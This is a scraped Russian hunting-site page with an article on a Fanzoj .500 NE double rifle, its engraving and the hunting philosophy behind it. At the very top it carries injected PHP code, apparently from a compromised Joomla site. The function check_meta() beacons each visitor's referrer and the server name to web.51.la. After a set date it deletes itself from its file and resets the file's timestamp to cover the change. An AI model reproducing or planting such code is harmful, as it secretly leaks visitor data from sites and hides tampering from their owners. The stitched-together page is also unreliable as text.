check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ШТУЦЕР ФАНЗОЙ

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 4001 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

ШТУЦЕР ФАНЗОЙ

Даниэла ФАНЗОЙ

На международной оружейной выставке IWA в Нюрнберге в марте этого года основным экспонатом нашей экспозиции был двуствольный штуцер с голландовскими эжекторами и замками (на боковых досках) «LIONFIRE» калибра .500 NE. При желании заказчика это ружье может быть изготовлено любого принятого калибра.

На оружии такого назначения нам представляется оптимальным неавтоматически предохранитель. Спусковая система с двумя крючками. Первый спуск имеет дополнительный шарнир, позволяющий ему отходить вперед с небольшим усилием. Это сделано для того, чтобы при выстреле из левого ствола исключить травмирование передней поверхности указательного пальца. Натяжение переднего спуска 1,8 кг., заднего – на 200 грамм больше. Запирание на два подствольных крюка и продолжение прицельной планки. Элегантная ложа с прямым английским гребнем изготовлена из корня кавказского грецкого ореха. С хорошо выраженной текстурой, с темным красноватым оттенком включениями. Слева –немецкая щечка. Затыльник выполнен из толстой кожи темно-коричневого цвета. На цевье и шейке приклада – насечка в виде тонкой рыбьей чешуи. После пропитки натуральным маслом поверхности ложи матирована и кажется шелковистой. Демиблочное соединение стволов из стали «Boehler Rasant» выполнено мягким припоем имеет для облегчения укороченную прицельную планку. Длина стволов 610 мм. Общий вес штуцера – 5,5 кг. Штуцер мы поставляем в кофре из слоновой кожи с принадлежностями, специально изготовленными в Англии. Отстрел штуцера был проведен на испытательной станции в Ферлахе. Его результаты оцениваются специалистами как выдающиеся.

Орудие Даниэлы Фанзой

Главной отличительной особенностью этого ружья была гравировка, в которой мы хотели передать нашу философию охоты и жизни вообще. К нашему глубокому удовлетворению, эта наша попытка не только не осталась незамеченной, но и вызвала большой интерес у участников и посетителей выставки. Наши потенциальные заказчики, желающие сделать вложения своих средств в уникальное оружие, увидели, что мы не только стремимся к техническому совершенству своих изделий, но и непрерывно совершенствуем их эстетические качества, стараясь выразить в оформлении ружей наше мировоззрение. Об этой философии, о средствах ее выражения мы расскажем на приме этого штуцера.

Почему люди украшают оружие

Стремление к украшению своего окружения заложено в самой природе человека. Приятно жить в красивой обстановке. Более того, чувство красоты и стремление к ней есть у всего живого. Украшение предметов личного пользования имеет еще одну важную цель – их индивидуализация, стремление выделить, отличить их от аналогичных предметов других людей. Украшения личного оружия началось еще в пещерные времена. Древний человек придавал изображениям животных мистический смысл, полагая, что изображение имеет реальную связь с изображенным животным. С нарисованным на стене пещеры туром, оленем или козерогом можно было поговорить и уговорить придти к водопою или к обрывистым скалам. А сильный зверь, нарисованный на древке копья, мог придать решительности и силы первобытному охотнику.  Учитывая мировосприятие древнего охотника, можно полагать, что в действительности так и происходило. Если положить руку на сердце, то ведь и сегодня что-то похожее мы услышим внутри себя. Именно поэтому нам хочется украсить наш дом трофеями, поэтому мы испытываем особую гордость, когда эти трофеи рекордные. Отголоски ископаемого языческого мироощущения вызывают в нас радость, когда сегодня на своем оружии мы видим анималистические гравюры. Но тысячелетия, которые отделяют нас от палеолита, значительно изменили наше сознание. Более того, менталитет современного человека изменяется с нарастающей скоростью. Вероятно, за последние три – четыре века он изменился больше, чем за все предыдущие тысячелетия, но проблемы жизни и смерти, охотника и объекта охоты остались во всей неисчерпаемой сложности. Нравственные нормы охотничьего ордена Святого Губертуса призывают проявлять любовь и уважение к диким животным как подтверждение почитания Бога – их создателя. Глава нашей семьи Иоганн Фанзой – приор этого ордена земли Каринтия, значительное время уделяет пропаганде нравственных основ охоты среди молодых начинающих охотников. Художественное оформление этого карабина – еще один способ пропаганды этой философии

Оружие Даниэлы Фанзой

Новые задачи – новые средства

Думая о том, как сделать идею декора штуцера наиболее выразительной и понятной мы некоторое время не выходили за рамки художественного стиля, характерного для австрийского охотничьего оружия конца позапрошлого века, который мы традиционно сохраняем в своем оружии. Одновременно мы видели, что в Италии бурно развивается техника булино, эстетически и эмоционально хорошо воспринимаемая. Некоторые европейские оружейные компании обращаются к помощи известнейших итальянских мастеров этого стиля для художественного оформления своего оружия. Нам не хотелось идти этим, уже проторенным, путем и мы обратились к известному австрийскому граверу Ритхи Майеру, хорошо известному представителю стиля скримшау. Эта техника появилась в США и широко распространилась по миру благодаря тому, что в ее основе лежит народное творчество многих народов мира. Суть этой техники состоит в нанесении на твердый материал коротких царапин и, как правило, последующем заполнении их краской.

В качестве сюжета, объединяющего все гравюрные миниатюры этого штуцера, мы избрали историю жизни льва, его жизненный цикл. Майер реализовал этот проект с начала до конца. Специально для нашего штуцера он разработал оригинальную технику, объединившую булино с рельефной гравировкой, намеренно уходя от традиционного стиля, от обрамления растительным орнаментом, почти обязательным для австрийского оружия. При этом ему удалось на небольших металлических поверхностях штуцера создать изображения животных, объединяющие реализм с глубоким символизмом.

Оружие Даниэлы Фанзой

О чем рассказывают миниатюры. Концепция гравировки

Изображения животных, украшающих штуцер, важнейшие философские символы. Львы – охотники и победители являются олицетворением смерти, в то время как преследуемые жертвы символизируют жизнь. Чередование контрастных полос (темных и светлых) на шкуре зебры символизирует единство и борьбу жизни и смерти.

Центральным изображением на нижней стороне колодки являются зебры, изображенные на фоне крупной головы львицы – древнейшего символа охотника. Обратная перспектива (животное на дальнем плане явно крупнее животных, находящихся впереди) создает ощущение обреченности зебр.

На спусковой скобе изображена голова молодого льва на фоне шкуры зебры. Этот фрагмент символизирует начало жизни. Львенок находится в самом начале жизненного цикла. Он окружен черно-белыми полосами шкуры зебры – символами ожидающих его жизненных противоречий.

Левая сторона колодки символизирует жизнь. На нем – львы и зебры в разных перспективах и ракурсах на полосатом фоне шкуры зебры. Лев и львица символизируют мужское и женское начало. Они смотрят друг на друга и дополняют друг друга в жизни и на охоте. Животные окружены растениями, символизирующими еще один аспект жизни. На этой же поверхности – две зебры, убегающие в неизвестность (скрывающиеся в облаках пыли). Возможно, там их ждет смерть, которую символизирует большой глаз льва. Здесь же снова черно-белые полосы как символы единства жизни и смерти.

Правая сторона колодки символизирует смерть. Здесь львы и зебры опять в разных перспективах и ракурсах. Они изображены на фоне полосатой шкуры зебры. В центре изображена львица, успешно завершившая охоту и убивающая свою жертву. Это яркий символ смерти. На заднем плане появляются грифы, завершающие круг жизни. Однако в смерти зебры и заключается смысл их жизни. С этого повторяется их жизненный цикл.

Медальон на торце пистолетной рукоятки шейки ложи. Здесь крупное  изображение глаза льва как будто с другой стороны. «Глаз льва видит все». Это третье изображение львиного глаза на этом штуцере. «Три» – символ божественного триединства. Три львиных глаза охватывают все, что изображено на штуцере. На все воля Божья. Кроме того, всюду черно-белые полосы – символ жизни и смерти в неразрывной близости, как напоминание из далекой античности: «Помни о смерти!»

 

Авторизованный перевод Владимира Тихомирова.

 

 

 

 

AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить